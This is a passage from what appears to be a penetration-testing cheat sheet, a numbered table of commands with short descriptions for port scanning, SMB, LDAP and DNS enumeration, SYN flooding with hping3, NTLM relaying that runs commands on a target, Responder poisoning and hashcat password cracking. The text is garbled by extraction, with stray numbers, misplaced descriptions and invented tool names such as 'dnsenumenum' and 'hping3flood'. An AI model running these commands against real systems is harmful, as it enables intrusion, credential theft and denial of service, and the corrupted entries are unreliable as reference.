4	100 100 111 (550	port 4444.
155	netcat -zv 192.168.1.1 1-65535	Scan all ports using Netcat.
156	smbclient -L //192.168.1.1 -U username	List SMB shares on a remote server.
157	smbmap -H 192.168.1.1 -u username -p password	Enumerate SMB shares and
450	1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1	permissions.
158	impacket-smbclient //192.168.1.1/share -user	SMB client from Impacket toolkit.
150	username	I DAD
159	ldapsearch -h 192.168.1.1 -x -b	LDAP enumeration.
160	"dc=example,dc=com"	Generate a custom wordlist from a
100	cewl http://192.168.1.1 -w wordlist.txt	website.
161	wfuzz -c -z file,/path/to/wordlist -u	Fuzz URLs for hidden files and
101	http://192.168.1.1/FUZZ	directories.
162	dnsenum example.com	DNS enumeration tool for finding
102	unserum example.com	subdomains.
163	dnsrecon -d example.com -t brt -D	Brute-force DNS subdomains.
	/path/to/wordlist.txt	
164	dnsenumenum example.com	Comprehensive DNS enumeration.
165	dnsmap example.com	DNS mapping and subdomain
	•	discovery tool.
166	masscan -p1-65535 192.168.1.1	Fast port scanner for large
	-	networks.
167	zmap -p 80 192.168.1.0/24	Fast network scanner focused on
		speed.
168	recon-ng	Web reconnaissance framework for
		information gathering.
169	fping -a -g 192.168.1.0/24	Ping sweep to discover live hosts.
170	hping3 -1 192.168.1.1	Send ICMP echo request to test
		connectivity.
171	hping3 -S 192.168.1.1 -p 80	Send TCP SYN packet to test if port
		80 is open.
172	hping3 -A 192.168.1.1 -p 80	Send TCP ACK packet to test if port
		80 is open.

173	hping3 -2 192.168.1.1 -p 53	Send UDP packet to test if port 53 is open.
174	hping3 -8 80 -c 1000 -S 192.168.1.1	Send 1000 SYN packets to port 80 to test for SYN flood.
175	hping3 -Q -p 80 -s 192.168.1.1	Sequence number analysis for TCP ports.
176	fping -a -g 192.168.1.0/24	Ping sweep to discover live hosts.
177	hping3flood -V -p 80 192.168.1.1	Send continuous SYN packets to flood a specific port.
178	masscan -p80,443 192.168.1.0/24	Fast port scanner for large networks.
179	zmap -p 80 192.168.1.0/24	Fast network scanner focused on speed.
180	whois example.com	Retrieve domain registration information.
181	dig example.com any	Retrieve DNS records for a domain.
182	nslookup example.com	Retrieve DNS records using nslookup.
183	fierce -dns example.com	DNS reconnaissance and enumeration tool.
184	dmitry -winsepfb http://192.168.1.1	Deepmagic Information Gathering Tool.
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190	searchsploit -m 12345	Mirror an exploit to the current directory.
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192	ntlmrelayx.py -smb2support -i	Relay captured NTLM hashes to SMB service.
193	smbrelayx.py -h 192.168.1.1 -c "whoami"	Relay NTLM hashes to execute commands on the target.
194	responder -I eth0 -w	Run Responder in full analysis mode.
195	hashcat -a 0 -m 0 /path/to/hashfile /path/to/wordlist	High-performance password cracking.
196	hashcat -a 3 -m 0 /path/to/hashfile ?a?a?a?a?a?a	Mask attack with brute-force for passwords of length 6.

197	hashcat -a 3 -m 1000 /path/to/hashfile ?l?l?l?l	Mask attack with lowercase letters
		for NTLM hashes.
198	hashcat -a 0 -m 1800 /path/to/hashfile	Dictionary attack on SHA-512
	/path/to/wordlist	hashes.
199	hashcat -a 1 -m 0 /path/to/hashfile	Combinator attack using two
	/path/to/wordlist /path/to/rules	wordlists.
200	hashcat -a 6 -m 0 /path/to/hashfile	Hybrid attack with dictionary and
	/path/to/wordlist ?d?d	2-digit suffix.